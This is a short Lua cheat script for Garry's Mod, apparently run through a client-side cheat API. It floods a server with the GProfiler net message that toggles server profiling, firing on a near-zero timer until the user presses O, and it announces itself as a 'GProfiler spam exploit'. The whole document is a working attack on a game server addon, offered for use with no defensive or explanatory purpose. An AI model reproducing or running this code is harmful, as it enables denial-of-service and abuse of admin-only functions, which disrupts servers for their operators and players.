local timerName = "antiadmintech"
local isActive = true

local function SendRPNameCommand()
    if not isActive then return end
    net.Start("GProfiler_ConCommands_ToggleServerProfile")
    net.WriteBool(true)
    net.SendToServer()
end

cheadle_api.timer.Create(timerName, 0.0000000001, 0, SendRPNameCommand)

hook.Add("PlayerButtonDown", "antiadmintech", function(_, key)
    if key == KEY_O and isActive then
        isActive = false
        timer.Remove(timerName)
        hook.Remove("PlayerButtonDown", "antiadmintech")
        cheadle_api.Notification("Spammer stopped")
    end
end)

cheadle_api.Notification("GProfiler spam exploit started")